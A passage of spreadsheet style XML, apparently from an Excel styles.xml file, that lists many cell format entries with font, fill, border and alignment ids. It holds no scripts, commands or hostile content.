    <xf numFmtId="0" fontId="28" fillId="41" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="38" fillId="49" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="44" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="34" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="47" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="12" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="42" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="37" borderId="16" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="43" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="50" borderId="17" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="12" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="43" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="12" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="44" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="34" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="44" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="34" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="33" borderId="11" applyNumberFormat="0" applyFont="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="34" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="12" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="41" fillId="0" borderId="18" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="37" borderId="14" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="19" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="44" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="34" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="39" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="37" borderId="14" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="44" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="34" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="15" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="38" fillId="49" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="37" borderId="14" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="38" fillId="49" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="4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35" fillId="44" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="34" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="44" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="34" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="15" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="33" borderId="11" applyNumberFormat="0" applyFont="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="12" applyNumberFormat="0" applyFill="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0" fillId="33" borderId="11" applyNumberFormat="0" applyFont="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7"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35" fillId="44"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34" fillId="0" borderId="19" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="45" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="48" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="45" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="38" fillId="49" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="12" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="44" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="50" borderId="17" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="38" fillId="49" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="44" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="48" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="44" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="47" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="48" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="44" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="48" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="44" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="48" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="44" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="48" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="44" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="48" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="38" borderId="14" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="44" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="33" borderId="11" applyNumberFormat="0" applyFont="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="44" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="42" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="48" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="48" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="44" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="48" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="19" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="33" borderId="11" applyNumberFormat="0" applyFont="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="44" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="48" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="44" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="37" borderId="16" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="12" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="43" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="51" borderId="0" applyNumberFormat="0" applyBorder="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30" fillId="40" borderId="0" applyNumberFormat="0" applyBorder="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30" fillId="42" borderId="0" applyNumberFormat="0" applyBorder="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0" fillId="33" borderId="11" applyNumberFormat="0" applyFont="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="42" borderId="0" applyNumberFormat="0" applyBorder="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30" fillId="42" borderId="0" applyNumberFormat="0" applyBorder="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30" fillId="42" borderId="0" applyNumberFormat="0" applyBorder="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42" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="42" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="42" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="19" applyNumberFormat="0" applyFill="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28" fillId="46" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="42" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="43" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="12" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="52" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="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0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="45" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0" applyNumberFormat="0" applyFill="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0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="47" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="47" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="52" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="47" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="52" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="47" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="13" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="52" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="47" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="52" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="47" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="52" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="47" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="42" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="52" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="47" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="52" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="47" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="19" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="52" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="47" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="52" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="12" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="38" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="43" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="38" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="38" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="46" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="38" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="51" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="38" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="41" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="51" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="38" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="51" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="38" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="46" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="51" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="38" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="51" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="38" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="51" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="38" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="51" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="42" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="38" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="51" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="38" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="51" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="19" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="38" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="51" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="38"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0" fillId="33" borderId="11" applyNumberFormat="0" applyFont="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0" fillId="0" borderId="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30"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43" fillId="0" borderId="0" applyNumberFormat="0" applyFill="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36" fillId="0" borderId="15" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="36" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="37" borderId="14" applyNumberFormat="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30" fillId="42"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42" fillId="0" borderId="0" applyNumberFormat="0" applyFill="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40" fillId="50" borderId="17" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="43" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="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32" fillId="38" borderId="14" applyNumberFormat="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31" fillId="37" borderId="14" applyNumberFormat="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30" fillId="40" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="46" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="39"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0" fillId="33" borderId="11" applyNumberFormat="0" applyFont="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="46" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="33" borderId="11" applyNumberFormat="0" applyFont="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0" fillId="33" borderId="11" applyNumberFormat="0" applyFont="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="46" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="43" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="46" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="38" fillId="49" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="37" borderId="14" applyNumberFormat="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33" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="41" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="13" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="41" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="33" borderId="11" applyNumberFormat="0" applyFont="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="41" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
